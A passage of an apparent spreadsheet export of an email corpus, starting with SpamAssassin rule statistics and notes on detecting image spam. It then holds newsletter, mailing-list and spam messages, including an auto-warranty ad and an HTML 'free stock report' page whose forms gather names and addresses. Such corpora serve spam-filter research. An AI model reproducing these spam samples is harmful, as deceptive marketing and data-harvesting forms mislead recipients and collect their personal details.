   0.126    0.396    0.000    1.00    0.70    0.01  T_HTML_IMAGE_AREA18
   0.119    0.375    0.000    1.00    0.70    0.01  T_HTML_IMAGE_AREA19
   0.119    0.375    0.000    1.00    0.70    0.01  T_HTML_IMAGE_AREA17
   1.125    3.523    0.010    1.00    0.68    0.01  T_HTML_IMAGE_AREA12
   0.741    2.314    0.010    1.00    0.65    0.01  T_HTML_IMAGE_AREA13
   1.542    4.732    0.058    0.99    0.58    0.01  T_HTML_IMAGE_AREA11
   0.139    0.417    0.010    0.98    0.54    0.01  T_HTML_IMAGE_AREA08
   0.483    1.397    0.058    0.96    0.50    0.01  T_HTML_IMAGE_AREA03
   0.192    0.500    0.048    0.91    0.44    0.01  T_HTML_IMAGE_AREA06
   0.820    1.834    0.349    0.84    0.39    0.01  T_HTML_IMAGE_AREA04
   0.946    2.022    0.446    0.82    0.38    0.01  T_HTML_IMAGE_AREA01
   0.569    0.896    0.417    0.68    0.32    0.01  T_HTML_IMAGE_AREA05
   6.498    0.500    9.287    0.05    0.02    0.01  T_HTML_IMAGE_AREA09
 Spam % of all rules with S/0 &gt; 0.90: 20.615%
 =============================
 The total number of IMG tags is really easy to do.
   0.648    2.043    0.000    1.00    0.81    0.01  T_HTML_NUM_IMGS08
   0.609    1.918    0.000    1.00    0.80    0.01  T_HTML_NUM_IMGS09
   0.490    1.543    0.000    1.00    0.79    0.01  T_HTML_NUM_IMGS10
   0.119    0.375    0.000    1.00    0.70    0.01  T_HTML_NUM_IMGS14
   0.986    3.064    0.019    0.99    0.63    0.01  T_HTML_NUM_IMGS06
   2.303    7.150    0.048    0.99    0.62    0.01  T_HTML_NUM_IMGS11
   0.033    0.104    0.000    1.00    0.61    0.01  T_HTML_NUM_IMGS17
   0.787    2.439    0.019    0.99    0.61    0.01  T_HTML_NUM_IMGS12
   0.344    1.063    0.010    0.99    0.60    0.01  T_HTML_NUM_IMGS13
   0.020    0.063    0.000    1.00    0.58    0.01  T_HTML_NUM_IMGS20
   0.020    0.063    0.000    1.00    0.58    0.01  T_HTML_NUM_IMGS16
   0.860    2.627    0.039    0.99    0.57    0.01  T_HTML_NUM_IMGS05
   0.754    2.293    0.039    0.98    0.56    0.01  T_HTML_NUM_IMGS07
   0.013    0.042    0.000    1.00    0.55    0.01  T_HTML_NUM_IMGS18
   0.887    2.627    0.078    0.97    0.52    0.01  T_HTML_NUM_IMGS04
   1.356    3.711    0.262    0.93    0.47    0.01  T_HTML_NUM_IMGS03
   0.046    0.125    0.010    0.93    0.46    0.01  T_HTML_NUM_IMGS15
   6.061   10.256    4.110    0.71    0.34    0.01  T_HTML_NUM_IMGS01
   0.040    0.063    0.029    0.68    0.32    0.01  T_HTML_NUM_IMGS19
   6.233    4.753    6.921    0.41    0.22    0.01  T_HTML_NUM_IMGS02
 Spam % of all rules with S/O &gt; 0.90: 31.25%
 =========================
 I figured that spam that is made up of only images is going to only
 have IMG tags interspersed with table, paragraph and linebreak tags,
 and some whitespace, so there would be a lot of IMG tags with no plain
 text (non-whitespace) between them.  So I defined consecutive IMG tags
 to be ones with no text between them, and looked at the longest run of
 consecutive IMGs within a message.
 This one seems to do pretty good, because in my non-spam corpus
 there's only a handful of messages with IMG runs larger than two.
   0.450    1.418    0.000    1.00    0.78    0.01  T_HTML_CONSEC_IMGS06
   0.232    0.730    0.000    1.00    0.74    0.01  T_HTML_CONSEC_IMGS08
   0.205    0.646    0.000    1.00    0.73    0.01  T_HTML_CONSEC_IMGS11
   1.813    5.691    0.010    1.00    0.71    0.01  T_HTML_CONSEC_IMGS02
   1.019    3.189    0.010    1.00    0.67    0.01  T_HTML_CONSEC_IMGS03
   0.768    2.397    0.010    1.00    0.66    0.01  T_HTML_CONSEC_IMGS05
   0.053    0.167    0.000    1.00    0.64    0.01  T_HTML_CONSEC_IMGS12
   1.006    3.127    0.019    0.99    0.63    0.01  T_HTML_CONSEC_IMGS04
   0.483    1.501    0.010    0.99    0.62    0.01  T_HTML_CONSEC_IMGS07
   0.020    0.063    0.000    1.00    0.58    0.01  T_HTML_CONSEC_IMGS13
   0.020    0.063    0.000    1.00    0.58    0.01  T_HTML_CONSEC_IMGS15
   1.032    3.148    0.048    0.98    0.57    0.01  T_HTML_CONSEC_IMGS10
   0.199    0.605    0.010    0.98    0.57    0.01  T_HTML_CONSEC_IMGS09
   0.013    0.042    0.000    1.00    0.55    0.01  T_HTML_CONSEC_IMGS17
   0.013    0.042    0.000    1.00    0.55    0.01  T_HTML_CONSEC_IMGS19
   0.007    0.021    0.000    1.00    0.51    0.01  T_HTML_CONSEC_IMGS14
   7.080    7.484    6.892    0.52    0.26    0.01  T_HTML_CONSEC_IMGS01
   0.000    0.000    0.000    0.00    0.00    0.01  T_HTML_CONSEC_IMGS16
   0.000    0.000    0.000    0.00    0.00    0.01  T_HTML_CONSEC_IMGS18
 Spam % of all rules with S/O &gt; 0.90: 22.85%
 ==========================
 Next I'm going to see if there's any meta rules I can make that will
 reduce the FP rate for low S/O rules.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</si>
  <si>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CNET: A note to our subscribers
</t>
  </si>
  <si>
    <t xml:space="preserve">CNET | CatchUp Dispatch
 CNET: A note to our subscribers
 July 17, 2002
 Vol. 3, No. 17
 Dear CatchUp newsletter subscribers:
 Starting this week, we will be taking a break from our
 regularly scheduled CatchUp newsletter--our apologies for any
 inconvenience this may cause. However, have no fear, the
 CatchUp database is still being updated, so run CatchUp now and
 see what updates are waiting for you. As always, a hearty
 thank-you for your continued support.
 Cheers!
 The CatchUp Team
 _________________________________________________________________
 The e-mail address for your subscription is qqqqqqqqqq-zdnet@spamassassin.taint.org
 To sign up for more CNET newsletters, click here:
 http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-zdnet@spamassassin.taint.org&amp;brand=cnet
 To unsubscribe, click here:
 http://clickthru.online.com/Click?q=89-h2JbrpJiraHZk5rhpCqNpVwaE_Yl9sRR
 For the CNET Newsletters FAQ, click here:
 http://clickthru.online.com/Click?q=9f-o7XMQ1JdPBetrVIYlcGhVIlcU_eR 
 To learn about advertising opportunities in CNET Newsletters, click
 here:
 http://clickthru.online.com/Click?q=b4-aJlbQ6Z1ubiOo-gqJzDxDXozLCyR 
 Copyright 2002 CNET Networks, Inc. All rights reserved.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: ADV: Extended Auto Warranties Here vfafu
</t>
  </si>
  <si>
    <t xml:space="preserve">Protect your financial well-being.
 Purchase an Extended Auto Warranty for your Car today. 
 CLICK HERE for a FREE no obligation quote.
 http://ww1.bestoffersonthenet.com/autoprotectquote/
 Car troubles always seem to happen at the worst possible time. 
 Protect yourself and your family with a quality Extended Warranty for your car, truck, or SUV, so that a large expense cannot hit you all at once. 
 We cover most vehicles with less than 150,000 miles.
 Buy DIRECT! Our prices are 40-60% LESS!
 We offer fair prices and prompt, toll-free claims service.  
 Get an Extended Warranty quote for your car today.
 Warranty plan also includes:
   1)   24-Hour Roadside Assistance.
   2)   Rental Benefit.
   3)   Trip Interruption Intervention.
   4)   Extended Towing Benefit.
 CLICK HERE for a FREE no obligation quote.
 http://ww1.bestoffersonthenet.com/autoprotectquote/
 ---------------------------------------
 To easily remove your address from the list, go to: 
 http://ww1.bestoffersonthenet.com/stopthemailplease/
 Please allow 48-72 hours for removal.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: And Away We go
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;&gt; Fear not poor Tom, between the pain &amp; endorphins and/or massive
 &gt;&gt; amounts of drugs, she should remember little of the process. Her body
 &gt;&gt; is designed to block out the whole event, so that she can tell other
 &gt;&gt; women "oh having the baby wasnt so bad, you should have one!". Why
 &gt;&gt; else would any woman be willing to EVER have sex.
 &gt;
 &gt; This tells me two things:
 &gt; 1. You are truly male.
 &gt; 2. You are a male who has a very narrow view of what sex is about.
 &gt;
 &gt; (:
 &gt;
 &gt; C
 Having not had a baby meself, but having listened to my mother and
 countless others retell the tale, I'd reccomend to Adam a few bits of
 advice:
 1)  We don't generally have sex just to get preggers.   You'd never get
 laid if that was the case. BUt hey, if we can convince you that the reason
 women don't have sex with you adam is because they don't want to carry
 your embittered, angry child, well hey.   Girls Win!
 2)  Birth control.   Let me say this again because Adam has forgotten the
 last 50 years (at least for the pill)  BIRTH control.
 3)  For many women with men who can actually uh... satisfy, sex is great. 
  Maybe you're lacking in this department ? ;)
 So moral of the story:   Women, keep telling Adam that no one will have
 sex with him because they don't want to get preggers with his angry,
 bitter children and go through the pain of childbirth.
 yea.. thats it.
 ;)
 &gt;
 &gt; http://xent.com/mailman/listinfo/fork
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: dumb question: X client behind a firewall?
</t>
  </si>
  <si>
    <t xml:space="preserve">"Joseph S. Barrera III" &lt;joe@barrera.org&gt; writes:
 &gt; Let's say you're behind a firewall and have a NAT address.
 &gt; Is there any way to telnet to a linux box out there in the world
 &gt; and set your DISPLAY in some way that you can create
 &gt; xterms on your own screen?
 Assuming your local display is X, SSH.
 -- 
 Karl Anderson      kra@monkey.org           http://www.monkey.org/~kra/
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [SAtalk] [OT] SpamAssassin figures...
</t>
  </si>
  <si>
    <t xml:space="preserve">I finally found the SpamAssassin ninja's!  After months of searchng.. I
 found the litte guys at a bowling alley in Valencia!  Here's a shot of my
 beloved clan!
 http://www.mattahfahtu.com/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</si>
  <si>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Re: Slaughter in the Name of God
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;&gt;&gt;&gt;&gt; "S" == Stephen D Williams &lt;sdw@lig.net&gt; writes:
     S&gt; A) Which religion is it that can claim no foul actions in its
     S&gt; past?  Certainly not Christianity, Islam, etc.
 Rastafari.
 That is, if you concede that of the two founding branches, only the
 one founded by the Nyabingi were legit and the others were
 thinly-veneered anti-colonial hooligans.  
 There is also Vietnamese Buddhism, unless you count setting fire to
 oneself as a "foul action".
     S&gt; C) Many splinter Christianity religions have 'clean hands' but
     S&gt; they also aren't 'found in the wild'.
 You'd have to explain "found in the wild".  For example, I know of
 no violence perpetrated by the South Pacific "Cargo Cults" outside
 of a pretty darn /mean/ game of cricket.
     S&gt; D) The Northern Ireland Protestant vs. Catholic feud, recently
     S&gt; more or less concluded, is not completely unlike this kind of
     S&gt; friction generated by splitting society too much along
     S&gt; religious lines.  One Post article pointed out that the problem
     S&gt; basically stemmed from the vertical integration of areas along
     S&gt; religious lines all the way to schools, government, political
     S&gt; party, etc.  (Of course both cases have a heritage of British
     S&gt; conquest, but who doesn't?)
 When we launched the Native Net in 1989, one of the first things we
 noticed on networking aboriginal groups around the world is that the
 British Army, with the US Army as a proxy by extension, were the
 common thread.  Where neither was present (physically or through
 influence) there /tended/ to be less violence.
 The issue in Ireland is complex, but rest assured that religious
 aspects are only a co-incidence of the invader/colonials being
 predominantly members of the Royal-headed Anglicans and the aboriginal
 population being predominantly members of the Pope-headed Catholics.
 The conflict itself has nothing to do with ideology or practice, since
 the Anglican Church is a near-identical clone of Catholicism.
 (now I bet that's going to attract some healthy debate ;)
     S&gt; .. most Protestants are unionists who want the
     S&gt; province to remain part of Britain.
 Mebst. Mebst.  It's the other way around.  Most Unionists are protestants.
 It's their _Unionism_ that is the source of the conflict, not their
 sacriments.
     S&gt; ... Police records and historians agree that the most lethal
     S&gt; group by far was the IRA, fighting on the Catholic side with a
     S&gt; goal of a united Ireland
 And which side of the colonial fence do you suppose the Police and
 Historians sit?  If the Russians had invaded the USA as feared in
 episodes such as the Bay of Pigs, would the Americans have organized
 to become a "lethal force", or would they have just said, "Oh well,
 there goes /that/ democracy!" and settle in under communist rule?
 Just wondering.
     &gt;&gt; 2. The US is trying to avoid making war on the Muslim religion.
 It is interesting to me that the Canadian media is trying to paint
 Chretien as some sort of buffoon for saying that 3rd-world poverty was
 a major contributor to 9-11.  If they'd /watch/ his now-infamous
 interview, they'd see that it's still us-against-hooligans, but his
 point is that the hooligans would not be able to find friendly states
 so easily if those states were not so bled-dry by the west.
 The same is true of street-gangs: When people are disenfranchised,
 it's easier to offer them the Triad as a new family.  You get
 cellphones, cars, a dry place to live.  Triad, biker gangs, mafia, the
 IRA, Al Queda ... we've been fighting the War on Terrorism for as long
 as there's been commerce, so you'd think we'd /realize/ that
 escalation of violence is not a solution.
 -- 
 Gary Lawrence Murphy - garym@teledyn.com - TeleDynamics Communications
  - blog: http://www.auracom.com/~teledyn - biz: http://teledyn.com/ -
   "Computers are useless. They can only give you answers." (Picasso)
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Membership Renewal
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HTML&gt;
 &lt;head&gt;
 &lt;META HTTP-EQUIV="Content-Type" CONTENT="text/html;charset=Windows-1252"&gt;
 &lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"&gt;
 &lt;TITLE&gt;Free Info!&lt;/TITLE&gt;
 &lt;META http-equiv=Content-Type content="text/html; charset=windows-1252"&gt;
 &lt;META content="Microsoft FrontPage 4.0" name=GENERATOR&gt;&lt;BASE href="http://62.232.161.231/freeinfo/"&gt;
 &lt;STYLE&gt;
 &lt;/STYLE&gt;
 &lt;/HEAD&gt;
 &lt;BODY bgColor=#ffffff leftMargin=0 topMargin=0&gt;
 &lt;TABLE borderColor=#ffa025 cellSpacing=0 cellPadding=0 width=680 align=center 
 bgColor=#f08800 border=2&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD&gt;
       &lt;TABLE borderColor=#000000 cellSpacing=0 cellPadding=0 width=660 
       align=center border=1&gt;
         &lt;TBODY&gt;
         &lt;TR&gt;
           &lt;TD vAlign=top noWrap borderColor=#ffa025 width=350 
           background="http://62.232.161.231/freeinfo/images/leftside.jpg"&gt;
             &lt;P align=center&gt;&lt;B&gt;&lt;A 
             name=top&gt;&lt;span style="letter-spacing: 5"&gt;&lt;u&gt;&lt;strong&gt;&lt;em&gt;&lt;font face="Times New Roman" size="7"&gt;FREE&lt;/font&gt;&lt;/em&gt;&lt;/strong&gt;&lt;/u&gt;&lt;/span&gt;&lt;/A&gt;&lt;/B&gt;&lt;/P&gt;
             &lt;P align=center style="line-height: 300%"&gt;&lt;b&gt;&lt;em&gt;&lt;font face="Times New Roman" size="7"&gt;The
             Insider Stock Market Report&lt;/font&gt;&lt;/em&gt;&lt;/b&gt;&lt;/P&gt;
             &lt;P align=center&gt;&lt;b&gt;&lt;font face="Times New Roman"&gt;&lt;font size="7"&gt;$2400 &lt;/font&gt;&lt;font size="6"&gt;Value&lt;/font&gt;&lt;/font&gt;&lt;FONT 
             color=#ffffff size=2&gt;&lt;BR&gt;&lt;/FONT&gt;&lt;/b&gt;&lt;/P&gt;
             &lt;P align=center&gt;&lt;b&gt;&lt;i&gt;&lt;font face="Arial, Helvetica, sans-serif" color="#ffffff" size="5"&gt;Get
             the latest competitive intelligence, insider knowledge and
             deal-sourcing contacts to stay ahead &amp;amp; succeed in this
             supercharged market!&lt;/font&gt;&lt;/i&gt;&lt;/b&gt;&lt;/P&gt;
             &lt;TABLE borderColor=#000000 cellSpacing=0 cellPadding=0 width=388 
             border=1&gt;
               &lt;TBODY&gt;
               &lt;TR&gt;
                 &lt;TD bgcolor="#009933" width="384"&gt;
                   &lt;p align="center"&gt;&lt;b&gt;&lt;font face="Georgia" size="5" color="#000000"&gt;Free
                   3 month subscription&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
                 &lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
             &lt;P align=center&gt;&lt;B&gt;&lt;i&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" color="#000000" size="4"&gt;Subscribed
             to by over 200 investment bankers, venture capitalists, fund
             managers, deal-makers and public company CEO &amp;amp; CFOs&lt;/font&gt;&lt;/i&gt;&lt;/B&gt;&lt;/P&gt;
             &lt;UL&gt;
               &lt;LI&gt;&lt;b&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" color="#000000" size="2"&gt;world
                 market overviews and updates&lt;/font&gt;&lt;/b&gt;
               &lt;LI&gt;&lt;b&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" color="#000000" size="2"&gt;&amp;quot;first
                 seen&amp;quot; analyst reports&lt;/font&gt;&lt;/b&gt;
               &lt;LI&gt;&lt;b&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" color="#000000" size="2"&gt;investment
                 alerts&lt;/font&gt;&lt;/b&gt;
               &lt;LI&gt;&lt;b&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" color="#000000" size="2"&gt;portfolio
                 strategies for the 21st century&lt;/font&gt;&lt;/b&gt;
               &lt;LI&gt;&lt;b&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" color="#000000" size="2"&gt;annual
                 offshore jurisdiction rankings report&lt;/font&gt;&lt;/b&gt;&lt;/UL&gt;
             &lt;TABLE cellPadding=4 width=390 bgColor=black&gt;
               &lt;TBODY&gt;
               &lt;TR&gt;
                 &lt;TD&gt;
                   &lt;p align="center"&gt;&lt;strong&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" color="white" size="5"&gt;Get
                   the information the professionals profit from $$$&lt;/font&gt;&lt;/strong&gt;&lt;/TD&gt;&lt;/TR&gt;
               &lt;TR&gt;
                 &lt;TD&gt;
                   &lt;p align="center"&gt;&lt;FONT 
             face="Arial, Helvetica, sans-serif"&gt;&lt;B&gt;&lt;FONT color=#ffffff size=2&gt;Fill out the form for&amp;nbsp;
             &lt;U&gt;FREE SUBSCRIPTION&lt;/U&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;/FONT&gt; &lt;FONT 
             face="Arial, Helvetica, sans-serif"&gt;&lt;B&gt;&lt;FONT color=#ffffff size=2&gt;No
             credit card needed!&lt;/FONT&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/p&gt;
  &lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
             &lt;P align="center"&gt;&lt;font color="#ffffff" size="2" face="Arial, Helvetica, sans-serif"&gt;&lt;b&gt;Sorry
             to see you go, but to
             unsubscribe from our newsletter&amp;nbsp;complete the following&lt;/b&gt;&lt;/font&gt;&lt;/P&gt;
             &lt;font color="#ffffff" size="2" face="Arial, Helvetica, sans-serif"&gt;&lt;b&gt;&lt;u&gt;&lt;FORM ACTION="http://62.232.161.231/freeinfo/cgi-bin/manager.pl" METHOD="POST"&gt;
 &lt;INPUT TYPE="HIDDEN" NAME="action" VALUE="remove"&gt;&lt;INPUT TYPE="HIDDEN" NAME="autoresponder" VALUE=""&gt;&lt;INPUT TYPE="HIDDEN" NAME="unsubscribe_redirect" VALUE="http://62.232.161.231/freeinfo/sorry.htm"&gt;
             &lt;/u&gt;
 &lt;p align="center"&gt;
 Email Address&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;u&gt;&lt;INPUT TYPE="TEXT" NAME="email" SIZE=13&gt;&lt;/u&gt;  
 &amp;nbsp;
             &lt;p align="center"&gt;&lt;u&gt;&lt;INPUT TYPE="HIDDEN" NAME="group1" VALUE="investors"&gt;&lt;INPUT TYPE="SUBMIT" VALUE="Unsubscribe"&gt;
             &lt;/p&gt;
 &lt;/FORM&gt;&lt;/u&gt;&lt;/b&gt;&lt;/font&gt;
           &lt;/TD&gt;
           &lt;TD vAlign=top width=300 bgColor=#000000&gt;
             &lt;P align=center&gt;&amp;nbsp;&lt;/P&gt;
             &lt;P align=center&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
             &lt;img border="0" src="http://62.232.161.231/freeinfo/images/rightsidestuff.jpg"&gt;&lt;/P&gt;
             &lt;TABLE width=383 align=center bgColor=#000000 border=0&gt;
               &lt;TBODY&gt;
               &lt;TR&gt;
                 &lt;TD width="375"&gt; &lt;SPAN&gt;
                   &lt;CENTER&gt;
                   &lt;TABLE width="370"&gt;
                     &lt;TBODY&gt;
                     &lt;TR&gt;
                       &lt;TD colSpan=2 width="367"&gt;
                         &lt;CENTER&gt;
                         &lt;FORM ACTION="http://62.232.161.231/freeinfo/cgi-bin/manager.pl" METHOD="POST"&gt;
 &lt;INPUT TYPE="HIDDEN" NAME="autoresponder" VALUE=""&gt;
 &lt;p&gt;&lt;font color="#FFFFFF" face="Arial" size="4"&gt;Please remember&lt;/font&gt;&lt;/p&gt;
 &lt;table border="0" width="99%"&gt;
   &lt;tr&gt;
     &lt;td width="100%" colspan="2"&gt;
       &lt;p align="center"&gt;&lt;font face="Arial" color="#FFFFFF"&gt;You must be 18 years
       of age or older&lt;/font&gt;
       &lt;p align="center"&gt;&lt;font face="Arial" color="#000000"&gt;.&lt;/font&gt;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;tr&gt;&lt;td width="42%"&gt;&lt;font face="Arial" color="#ffffff" size="3"&gt;Your&amp;nbsp;First&amp;nbsp;Name:*&lt;/font&gt;&lt;/td&gt;&lt;/center&gt;&lt;/center&gt;&lt;td width="75%"&gt;&lt;p align="left"&gt;&lt;font face="Arial" color="#FFFFFF" size="3"&gt;&lt;INPUT TYPE="TEXT" NAME="f_name" size="20"&gt;&lt;/font&gt;&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;CENTER&gt;&lt;CENTER&gt;&lt;tr&gt;&lt;td width="42%"&gt;&lt;font face="Arial" color="#ffffff" size="3"&gt;Your&amp;nbsp;Last&amp;nbsp;Name:*&lt;/font&gt;&lt;/td&gt;&lt;/center&gt;&lt;/center&gt;&lt;td width="75%"&gt;&lt;p align="left"&gt;&lt;font face="Arial" color="#FFFFFF" size="3"&gt;&lt;INPUT TYPE="TEXT" NAME="l_name" size="20"&gt;&lt;/font&gt;&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;CENTER&gt;&lt;CENTER&gt;&lt;tr&gt;&lt;td width="42%"&gt;&lt;font color="#ffffff" size="3" face="Arial"&gt;Street&amp;nbsp;Address:*&lt;/font&gt;&lt;/td&gt;&lt;/center&gt;&lt;/center&gt;&lt;td width="75%"&gt;&lt;p align="left"&gt;&lt;font color="#FFFFFF" size="3" face="Arial"&gt;&lt;INPUT TYPE="TEXT" NAME="addr_1" size="20"&gt;&lt;/font&gt;&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;CENTER&gt;&lt;CENTER&gt;&lt;tr&gt;&lt;td width="42%"&gt;&lt;font face="Arial" color="#ffffff" size="3"&gt;City*&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/font&gt;&lt;/td&gt;&lt;/center&gt;&lt;/center&gt;&lt;td width="73%"&gt;&lt;p align="left"&gt;&lt;SPAN&gt;&lt;font colo!
 r="#FFFFFF" size="3" face="Arial"&gt;&lt;INPUT TYPE="TEXT" NAME="addr_2" size="20"&gt;&lt;/font&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;CENTER&gt;&lt;CENTER&gt;&lt;tr&gt;&lt;td width="42%"&gt;&lt;span&gt;&lt;font face="Arial" color="#ffffff" size="3"&gt;Postal&amp;nbsp;/&amp;nbsp;Zip&amp;nbsp;Code:*&lt;/font&gt;&lt;/span&gt;&lt;/td&gt;&lt;/center&gt;&lt;/center&gt;&lt;td width="75%"&gt;&lt;p align="left"&gt;&lt;font color="#FFFFFF" size="3" face="Arial"&gt;&lt;INPUT TYPE="TEXT" NAME="addr_3" size="20"&gt;&lt;/font&gt;&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;CENTER&gt;&lt;CENTER&gt;&lt;tr&gt;&lt;td width="42%"&gt;&lt;font face="Arial" color="#ffffff" size="3"&gt;Country:*&lt;/font&gt;&lt;/td&gt;&lt;/center&gt;&lt;/center&gt;&lt;td width="75%"&gt;&lt;p align="left"&gt;&lt;SPAN&gt;&lt;font face="Arial" size="3" color="#FFFFFF"&gt;&lt;select size="1" name="addr_4"&gt;&lt;option value="." SELECTED&gt;Select&lt;option value="al"&gt;Albania&lt;option value="dz"&gt;Algeria&lt;option value="as"&gt;American Samoa&lt;option value="ad"&gt;Andorra&lt;option value="ao"&gt;Angola&lt;option value="ai"&gt;Anguilla&lt;option value="aq"&gt;Antarctica&lt;option value="ag"&gt;Antigua &amp;amp; Barbuda&lt;option value="ar"&gt;Argentina&lt;option value="am"&gt;Armenia&lt;option value="aw"&gt;Aruba&lt;option value="a!
 u"&gt;Australia&lt;option value="at"&gt;Austria&lt;option value="az"&gt;Azerbaijan&lt;option value="bs"&gt;Bahamas&lt;option value="bh"&gt;Bahrain&lt;option value="bd"&gt;Bangladesh&lt;option value="bb"&gt;Barbados&lt;option value="by"&gt;Belarus&lt;option value="be"&gt;Belgium&lt;option value="bz"&gt;Belize&lt;option value="bj"&gt;Benin&lt;option value="bm"&gt;Bermuda&lt;option value="bt"&gt;Bhutan&lt;option value="bo"&gt;Bolivia&lt;option value="ba"&gt;Bosnia&lt;option value="bw"&gt;Botswana&lt;option value="bv"&gt;Bouvet Island&lt;option value="br"&gt;Brazil&lt;option value="io"&gt;British Ocean Territory&lt;option value="vg"&gt;British Virgin Isles&lt;option value="bn"&gt;Brunei&lt;option value="bg"&gt;Bulgaria&lt;option value="bf"&gt;Burkina Faso&lt;option value="bu"&gt;Burma&lt;option value="bi"&gt;Burundi&lt;option value="kh"&gt;Cambodia&lt;option value="cm"&gt;Cameroon&lt;option value="cv"&gt;Cape Verde&lt;option value="ky"&gt;Cayman Islands&lt;option value="cf"&gt;Central African Rep.&lt;option value="td"&gt;Chad&lt;option value="cl"&gt;Chile&lt;option value="cn"&gt;China&lt;option value="cx"&gt;Christmas Island&lt;option value="cc"&gt;Cocos Islands&lt;option value="co"&gt;C!
 olombia&lt;option value="km"&gt;Comoros&lt;option value="cg"&gt;Congo&lt;option value="ck"&gt;Cook Islands&lt;option value="cr"&gt;Costa Rica&lt;option value="hr"&gt;Croatia&lt;option value="cy"&gt;Cyprus&lt;option value="cz"&gt;Czech Republic&lt;option value="dk"&gt;Denmark&lt;option value="dj"&gt;Djibouti&lt;option value="dm"&gt;Dominica&lt;option value="do"&gt;Dominican Republic&lt;option value="tp"&gt;East Timor&lt;option value="ec"&gt;Ecuador&lt;option value="eg"&gt;Egypt&lt;option value="sv"&gt;El Salvador&lt;option value="gq"&gt;Equatorial Guinea&lt;option value="er"&gt;Eritrea&lt;option value="ee"&gt;Estonia&lt;option value="et"&gt;Ethiopia&lt;option value="fk"&gt;Falkland Islands&lt;option value="fo"&gt;Faroe Islands&lt;option value="fj"&gt;Fiji&lt;option value="fi"&gt;Finland&lt;option value="fr"&gt;France&lt;option value="gf"&gt;French Guiana&lt;option value="pf"&gt;French Polynesia&lt;option value="tf"&gt;French Southern&lt;option value="ga"&gt;Gabon&lt;option value="gm"&gt;Gambia&lt;option value="ge"&gt;Georgia&lt;option value="de"&gt;Germany&lt;option value="gh"&gt;Ghana&lt;option value="gi"&gt;Gibraltar&lt;option value="gr"&gt;Greece&lt;option value="gl"&gt;Greenlan!
 d&lt;option value="gd"&gt;Grenada&lt;option value="gp"&gt;Guadeloupe&lt;option value="gt"&gt;Guatemala&lt;option value="gn"&gt;Guinea&lt;option value="gw"&gt;Guinea-Bissau&lt;option value="gy"&gt;Guyana&lt;option value="ht"&gt;Haiti&lt;option value="hm"&gt;Heard &amp;amp; McDonald Isles&lt;option value="hn"&gt;Honduras&lt;option value="hk"&gt;Hong Kong&lt;option value="hu"&gt;Hungary&lt;option value="is"&gt;Iceland&lt;option value="in"&gt;India&lt;option value="id"&gt;Indonesia&lt;option value="ie"&gt;Ireland&lt;option value="il"&gt;Israel&lt;option value="it"&gt;Italy&lt;option value="ci"&gt;Ivory Coast&lt;option value="zzzz"&gt;Jamaica&lt;option value="jp"&gt;Japan&lt;option value="jo"&gt;Jordan&lt;option value="kz"&gt;Kazakhstan&lt;option value="ke"&gt;Kenya&lt;option value="ki"&gt;Kiribati&lt;option value="kr"&gt;Korea, South&lt;option value="kw"&gt;Kuwait&lt;option value="kg"&gt;Kyrgyzstan&lt;option value="la"&gt;Laos&lt;option value="lv"&gt;Latvia&lt;option value="lb"&gt;Lebanon&lt;option value="ls"&gt;Lesotho&lt;option value="lr"&gt;Liberia&lt;option value="li"&gt;Liechtenstein&lt;option value="lt"&gt;Lithuania&lt;option value="lu"&gt;Luxembourg&lt;option value="mo"&gt;Macau&lt;option val!
 ue="mk"&gt;Macedonia&lt;option value="mg"&gt;Madagascar&lt;option value="mw"&gt;Malawi&lt;option value="my"&gt;Malaysia&lt;option value="mv"&gt;Maldives&lt;option value="ml"&gt;Mali&lt;option value="mt"&gt;Malta&lt;option value="mh"&gt;Marshall Islands&lt;option value="mq"&gt;Martinique&lt;option value="mr"&gt;Mauritania&lt;option value="mu"&gt;Mauritius&lt;option value="yt"&gt;Mayotte&lt;option value="mx"&gt;Mexico&lt;option value="fm"&gt;Micronesia&lt;option value="md"&gt;Moldova&lt;option value="mc"&gt;Monaco&lt;option value="mn"&gt;Mongolia&lt;option value="ms"&gt;Montserrat&lt;option value="ma"&gt;Morocco&lt;option value="mz"&gt;Mozambique&lt;option value="na"&gt;Namibia&lt;option value="nr"&gt;Nauru&lt;option value="np"&gt;Nepal&lt;option value="nl"&gt;Netherlands&lt;option value="an"&gt;Netherlands Antilles&lt;option value="nc"&gt;New Caledonia&lt;option value="nz"&gt;New Zealand&lt;option value="ni"&gt;Nicaragua&lt;option value="ne"&gt;Niger&lt;option value="ng"&gt;Nigeria&lt;option value="nu"&gt;Niue&lt;option 